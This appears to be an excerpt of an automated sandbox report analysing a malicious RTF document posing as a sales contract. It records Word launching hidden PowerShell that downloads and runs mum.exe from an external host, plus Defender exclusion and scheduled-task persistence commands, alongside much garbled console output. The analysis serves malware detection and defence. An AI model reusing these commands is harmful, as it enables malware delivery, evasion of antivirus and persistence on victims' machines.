          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FBF5034_2_005FBF50
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F004834_2_005F0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F8F7834_2_005F8F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F827034_2_005F8270
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F756834_2_005F7568
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FAC6834_2_005FAC68
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F7E1834_2_005F7E18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F381034_2_005F3810
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F711034_2_005F7110
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F160034_2_005F1600
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F450034_2_005F4500
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FB90034_2_005FB900
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F683834_2_005F6838
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FD23834_2_005FD238
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F5B3034_2_005F5B30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F2D2034_2_005F2D20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F8B2034_2_005F8B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FA62034_2_005FA620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F56D834_2_005F56D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F9FD034_2_005F9FD0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F86C834_2_005F86C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F79C034_2_005F79C0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F08F834_2_005F08F8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FCBF034_2_005FCBF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F63E034_2_005F63E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F6C9034_2_005F6C90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F5F8834_2_005F5F88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F998034_2_005F9980
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F1EB034_2_005F1EB0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FB2B034_2_005FB2B0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F11A834_2_005F11A8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F04A034_2_005F04A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FC5A034_2_005FC5A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F755834_2_005F7558
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F1A4A34_2_005F1A4A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F0D4134_2_005F0D41
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F5F7834_2_005F5F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F8F6934_2_005F8F69
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F826034_2_005F8260
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F8B1A34_2_005F8B1A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F2D1234_2_005F2D12
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FA61134_2_005FA611
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F7E0934_2_005F7E09
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F000634_2_005F0006
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F710634_2_005F7106
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F682834_2_005F6828
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F5B2034_2_005F5B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F63D134_2_005F63D1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F56D034_2_005F56D0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F44F234_2_005F44F2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F15F134_2_005F15F1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005FB8F134_2_005FB8F1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F08E834_2_005F08E8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F349834_2_005F3498
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F119834_2_005F1198
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F049034_2_005F0490
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F348934_2_005F3489
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F6C8034_2_005F6C80
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F86B834_2_005F86B8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F79B134_2_005F79B1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 34_2_005F1EAA34_2_005F1EAA
          Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\mum.exeMemory allocated: 77740000 page execute and read and write
          Source: mum[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: mum.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: RRUwFfPTEDHYrl.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Revised sales contract for Crosswear.rtfReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Roaming\mum.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.........-.......j.....p.........j.......e.....`Ig.......bw.....................Kn.....................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Zuk.....~..............................}.dw....8.......0.!..............$n.............p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...p.......0.!.............H$n.....6.......p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Zuk....(...............................}.dw............0.!..............$n.............p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw............0.!.............H$n.....".......p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Zuk....p...............................}.dw............0.!..............$n.............p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............c]uk.....'n.............................}.dw............0.!.............................p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Zuk....p...............................}.dw............0.!..............$n.............p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............c]uk.....'n.............................}.dw....(.......0.!.....................f.......p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Zuk....................................}.dw....`.......0.!..............$n.............p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............c]uk.....'n.............................}.dw.... .......0.!.............................p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Zuk....................................}.dw....X.......0.!..............$n.............p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............c]uk.....'n.............................}.dw............0.!.....................f.......p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Zuk....H...............................}.dw............0.!..............$n.............p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w....... .......c]uk.....'n.............................}.dw....X.......0.!.............H$n.............p...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Zuk....................................}.dw............0.!..............$n.............p...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................l........Z......................0.......#.......................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................D........Z......................0.......#.......h...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................D........Z......................0......./.........................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................D........[......................0......./.......h...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................D.......C[......................0.......;...............|.........7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................D.......`[......................0.......;.......h...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........[......................0.......G.......h.......".........7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................D........[......................0.......G.......h.................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................D........[......................0.......S.........................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................D........[......................0.......S.......h...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......E.D.H.Y.r.l...e.x.e.............D........\......................0......._.......h.................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................D.......6\......................0......._.......h.................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................D.......^\......................0.......k.........................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................D.......y\......................0.......k.......h...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.........7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................D........\......................0.......w.......h.................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................D........\......................0.......................l.........7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................D........]......................0...............h...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................D......./]......................0...............h.................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................D.......L]......................0...............h.................7.............Jump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................h.......(.P.....................l.......6Y......................................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............pV{k....................................}.dw....P.......0...............X `.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.................`.....6.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............pV{k....@...............................}.dw............0...............X `.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw............0.................`.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............pV{k....................................}.dw............0...............X `.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................W{k.....#`.............................}.dw............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............pV{k....................................}.dw............0...............X `.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................W{k.....#`.............................}.dw....@.......0.......................f.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............pV{k....................................}.dw....x.......0...............X `.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................W{k.....#`.............................}.dw....8.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............pV{k....................................}.dw....p.......0...............X `.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................W{k.....#`.............................}.dw............0.......................f.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............pV{k....`...............................}.dw............0...............X `.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.~.....w....... ........W{k.....#`.............................}.dw....p.......0.................`.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............pV{k....(...............................}.dw............0...............X `.............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....p...............l.......Zr......................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....p...............l.......{r......................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....p...............l........r......................0......./.......................(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....p...............t........r......................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....p...............t........r......................0.......;...............|.......(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....p...............t........s......................0.......;.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......Cs......................0.......G...............".......(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....p...............t.......^s......................0.......G.......................(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....p...............t........s......................0.......S.......................(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....p...............t........s......................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......E.D.H.Y.r.l...e.x.e.............t........s......................0......._.......................(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....p...............t........s......................0......._.......................(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....p...............p....... t......................0.......k.......................(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....p...............t.......<t......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....p...............p........t......................0.......w.......................(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....p...............l........t......................0.......................l.......(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....p...............l........t......................0...............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....p...............l........t......................0...............................(...............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....p...............t........u......................0...............................(...............
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...................l........o........................................%.............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.....................l........o..............................................j.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................).......................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................F.......................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............................n.......................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................;.......................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................V.......................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......E.D.H.Y.r.l...e.x.e.............................................0......._.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............................".......................0.......w.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................J.......................0.......................l.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................e.......................0...............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................0...............................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...................T...............................................8...............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.....................T.......................................................j.......X...............
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Users\user\AppData\Roaming\mum.exe C:\Users\user\AppData\Roaming\mum.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exeJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exeJump to behavior
